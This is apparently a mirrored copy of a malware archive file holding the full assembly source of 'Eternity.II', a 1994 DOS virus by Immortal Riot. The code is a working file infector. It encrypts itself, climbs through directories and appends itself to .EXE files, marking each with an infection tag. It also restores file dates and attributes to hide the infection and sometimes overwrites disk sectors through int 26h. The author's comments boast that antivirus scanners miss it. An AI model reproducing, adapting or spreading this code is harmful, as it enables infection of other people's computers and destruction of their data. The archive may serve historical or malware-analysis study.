mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-23 02:28:54 +00:00
276 lines
6.2 KiB
NASM
276 lines
6.2 KiB
NASM
|
; -Eternity.II-
|
|||
|
; "Created by Immortal Riot's destructive development team"
|
|||
|
; (c) '94 The Unforgiven/Immortal Riot
|
|||
|
;
|
|||
|
; "If this virus survive into eternity, I'll live forever"
|
|||
|
; or
|
|||
|
; "Nothing last forever"
|
|||
|
;
|
|||
|
; Notes:
|
|||
|
; F-Prot, Scan, TBAV, Findviru, can't find shits of this virus.
|
|||
|
;
|
|||
|
; Disclaimer:
|
|||
|
; If this virus harms your computer and you kill yourself,
|
|||
|
; I'll not attend on nor pay for your funeral.
|
|||
|
;
|
|||
|
; Dedication:
|
|||
|
; I dedicate this virus to all members of Dia Psalma for all
|
|||
|
; the ideoligical inspiration I've gained from listening on
|
|||
|
; their music as well as talking with them.
|
|||
|
|
|||
|
.model tiny
|
|||
|
.radix 16
|
|||
|
.code
|
|||
|
|
|||
|
Virus_Lenght EQU Virus_End-Virus_Start
|
|||
|
org 100
|
|||
|
|
|||
|
Virus_Start:
|
|||
|
xchg ax, ax ; A nop to fill out the virus
|
|||
|
mov ax,0fa01h ; to be exactly 600 bytes!
|
|||
|
mov dx,5945h
|
|||
|
int 16h
|
|||
|
|
|||
|
call Get_delta ; Get the delta-offset!
|
|||
|
Get_delta:
|
|||
|
pop bp
|
|||
|
sub bp,Get_Delta-Virus_Start
|
|||
|
|
|||
|
call encrypt_decrypt ; Decrypt the virus
|
|||
|
jmp short encryption_start ; then continue..
|
|||
|
|
|||
|
write_virus:
|
|||
|
call encrypt_decrypt ; Encrypt the virus
|
|||
|
mov ah,40
|
|||
|
mov cx,Virus_Lenght
|
|||
|
mov dx,bp
|
|||
|
int 21
|
|||
|
call encrypt_decrypt ; Decrypt it again
|
|||
|
ret
|
|||
|
|
|||
|
encryption_value dw 0
|
|||
|
encrypt_decrypt:
|
|||
|
lea si,cs:[bp+encryption_start-virus_start]
|
|||
|
mov cx,(end_of_virus-encryption_start+1)/2
|
|||
|
mov dx,word ptr cs:[bp+encryption_value-virus_start]
|
|||
|
|
|||
|
Xor_LoopY:
|
|||
|
xor word ptr cs:[si],dx
|
|||
|
inc si
|
|||
|
inc si
|
|||
|
loop Xor_LoopY
|
|||
|
ret
|
|||
|
|
|||
|
encryption_start: ; Heuristic, beat this!
|
|||
|
mov ax,es
|
|||
|
add ax,10
|
|||
|
add ax,cs:[bp+Exe_header-Virus_Start+16]
|
|||
|
push ax
|
|||
|
push cs:[bp+Exe_header-Virus_Start+14]
|
|||
|
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,1a ; Set the DTA
|
|||
|
lea dx,[bp+Own_dta-virus_start]
|
|||
|
int 21
|
|||
|
|
|||
|
One_Percent:
|
|||
|
mov ah,2ch ; 1%
|
|||
|
int 21h
|
|||
|
cmp dl,0
|
|||
|
jne get_drive
|
|||
|
|
|||
|
Cruel: ; God what I hate that
|
|||
|
mov al,2h ; eskimoe!
|
|||
|
mov cx,1
|
|||
|
lea bx,v_name
|
|||
|
cwd
|
|||
|
int 26h
|
|||
|
|
|||
|
Get_drive: ; Current drive
|
|||
|
mov ah,19h
|
|||
|
int 21h
|
|||
|
cmp al,2 ; A: or B:?
|
|||
|
jae get_dir
|
|||
|
jmp restore_dir ; Yep, then don't infect
|
|||
|
; other files that run!
|
|||
|
Get_Dir:
|
|||
|
mov ah,47
|
|||
|
xor dl,dl
|
|||
|
lea si,[bp+dir-virus_start]
|
|||
|
int 21
|
|||
|
|
|||
|
Di_Counter:
|
|||
|
xor di,di ; Infection counter=0
|
|||
|
; will be inc after each infection!
|
|||
|
|
|||
|
_4EH:
|
|||
|
mov ah,4e ; Bummer..
|
|||
|
|
|||
|
Loop_Files:
|
|||
|
lea dx,[bp+file_match-virus_start]
|
|||
|
int 21
|
|||
|
|
|||
|
jnc clear_attribs ; We did find a file!
|
|||
|
; Happy Happy, joy joy!
|
|||
|
Dot_Dott:
|
|||
|
lea dx,[bp+dot_dot-virus_start] ; Ah, the same old
|
|||
|
mov ah,3bh ; dot-dot-routine again!
|
|||
|
int 21h
|
|||
|
|
|||
|
jnc not_root ; No error!
|
|||
|
jmp no_victim_found ; No more files in ..
|
|||
|
|
|||
|
not_root:
|
|||
|
mov ah,4e ; Find first file
|
|||
|
jmp short Loop_Files ; in the new directory
|
|||
|
|
|||
|
Clear_attribs: ; Clear file-attrib
|
|||
|
mov ax,4301h
|
|||
|
xor cx,cx
|
|||
|
lea dx,[bp+own_dta-virus_start+1eh] ; 1eh=filename in DTA-aera
|
|||
|
int 21h
|
|||
|
|
|||
|
Open_File:
|
|||
|
mov ax,3d02 ; Open file in read/write mode
|
|||
|
mov dx,Own_dta-Virus_Start+1e ; Yep, it's still 1eh in DTA!
|
|||
|
add dx,bp ; bummer!
|
|||
|
int 21
|
|||
|
|
|||
|
jnc read_File ; No error, then read the file!
|
|||
|
jmp cant_open_file ; Hrm?!
|
|||
|
|
|||
|
v_name db "Eternity_II" ; Virus name!
|
|||
|
|
|||
|
|
|||
|
Read_File:
|
|||
|
xchg ax,bx ;File handle in bx
|
|||
|
|
|||
|
mov ah,3f ;Read file - 28 bytes
|
|||
|
mov cx,1c ;to EXE_header (1ch)
|
|||
|
lea dx,[bp+exe_header-virus_start]
|
|||
|
int 21
|
|||
|
|
|||
|
jnc no_error ; It worked (duh)
|
|||
|
jmp read_error ; Hrm?!
|
|||
|
|
|||
|
no_error:
|
|||
|
cmp byte ptr ds:[bp+Exe_header-Virus_Start],'M'
|
|||
|
jnz no_exe
|
|||
|
cmp word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
|
|||
|
jz infected
|
|||
|
|
|||
|
mov al,2 ; File pointer
|
|||
|
call F_Ptr ; to end of file
|
|||
|
|
|||
|
push dx
|
|||
|
push ax
|
|||
|
|
|||
|
Random:
|
|||
|
mov ah,2ch ; Yah. Nearly polymorfic?
|
|||
|
int 21h ; Oh well :-).
|
|||
|
add dl,dh
|
|||
|
jz random
|
|||
|
mov word ptr cs:[bp+encryption_value-virus_start],dx
|
|||
|
|
|||
|
call write_virus ; Write encrypted copy
|
|||
|
|
|||
|
mov al,2 ; File pointer to end of file
|
|||
|
Call F_Ptr
|
|||
|
|
|||
|
mov cx,200 ; bummer..
|
|||
|
div cx
|
|||
|
inc ax
|
|||
|
mov word ptr ds:[Exe_header-Virus_Start+2+bp],dx
|
|||
|
mov word ptr ds:[Exe_header-Virus_Start+4+bp],ax
|
|||
|
|
|||
|
pop ax
|
|||
|
pop dx
|
|||
|
|
|||
|
mov cx,10
|
|||
|
div cx
|
|||
|
sub ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
|
|||
|
mov word ptr ds:[Exe_header-Virus_Start+16+bp],ax
|
|||
|
mov word ptr ds:[Exe_header-Virus_Start+14+bp],dx
|
|||
|
mov word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'
|
|||
|
|
|||
|
mov al,0 ; File pointer to top of file
|
|||
|
call F_Ptr
|
|||
|
|
|||
|
mov ah,40 ; Write header
|
|||
|
mov cx,1c
|
|||
|
lea dx,[bp+exe_header-virus_start]
|
|||
|
int 21
|
|||
|
|
|||
|
jc write_error ; Hrm!?
|
|||
|
|
|||
|
no_exe:
|
|||
|
jmp short Restore_Time_Date
|
|||
|
|
|||
|
infected: ; Decrease infection counter
|
|||
|
dec di ; with one
|
|||
|
|
|||
|
Restore_Time_Date: ; Nearly stealth?
|
|||
|
lea si,[bp+own_dta-virus_start+16h] ; Oh well :-).
|
|||
|
mov cx,word ptr [si]
|
|||
|
mov dx,word ptr [si+2]
|
|||
|
mov ax,5701h
|
|||
|
int 21h
|
|||
|
|
|||
|
Close_File: ; Close the file
|
|||
|
mov ah,3e
|
|||
|
int 21
|
|||
|
|
|||
|
Set_Back_Attribs: ; Stealth-bomber!
|
|||
|
mov ax,4301h
|
|||
|
xor ch,ch
|
|||
|
lea bx,[bp+own_dta-virus_start+15h]
|
|||
|
mov cl,[bx]
|
|||
|
lea dx,[bp+own_dta-virus_start+1eh]
|
|||
|
int 21h
|
|||
|
|
|||
|
Sick_or_EXE:
|
|||
|
mov ah,4f ; 4fh=find next file
|
|||
|
inc di
|
|||
|
cmp di,3 ; Infected three files?
|
|||
|
jae finnished_infection ; Yep!
|
|||
|
jmp Loop_Files ; Nah!
|
|||
|
|
|||
|
F_Ptr: ; Since we're using
|
|||
|
mov ah,42 ; this routine
|
|||
|
xor cx,cx ; three times,
|
|||
|
cwd ; calling this
|
|||
|
int 21 ; will save us
|
|||
|
ret ; some bytes
|
|||
|
|
|||
|
write_error: ; For no use in this virus,
|
|||
|
read_error: ; but if something screws
|
|||
|
cant_open_file: ; up, add 09/i21h functions,
|
|||
|
no_victim_found: ; and test what didn't work.
|
|||
|
finnished_infection: ;
|
|||
|
|
|||
|
Restore_Dir: ; More stealth..
|
|||
|
lea dx,[bp+dir-virus_start]
|
|||
|
mov ah,3bh
|
|||
|
int 21
|
|||
|
|
|||
|
quit: ; Return to original program
|
|||
|
pop ds
|
|||
|
retf
|
|||
|
|
|||
|
groupdb db "(c) '94 The Unforgiven/Immortal Riot" ; That's moi..
|
|||
|
|
|||
|
dot_dot db '..',0 ; Another directory
|
|||
|
file_match db '*.EXE',0 ; Infect <20>m all!
|
|||
|
|
|||
|
Exe_header db 16 DUP(0)
|
|||
|
dw 0fff0
|
|||
|
db 4 DUP(0)
|
|||
|
Own_Dta db 02bh DUP(0)
|
|||
|
dir db 65 dup (?) ; Really really stupid!
|
|||
|
|
|||
|
Virus_End EQU $
|
|||
|
end_of_virus:
|
|||
|
end Virus_Start
|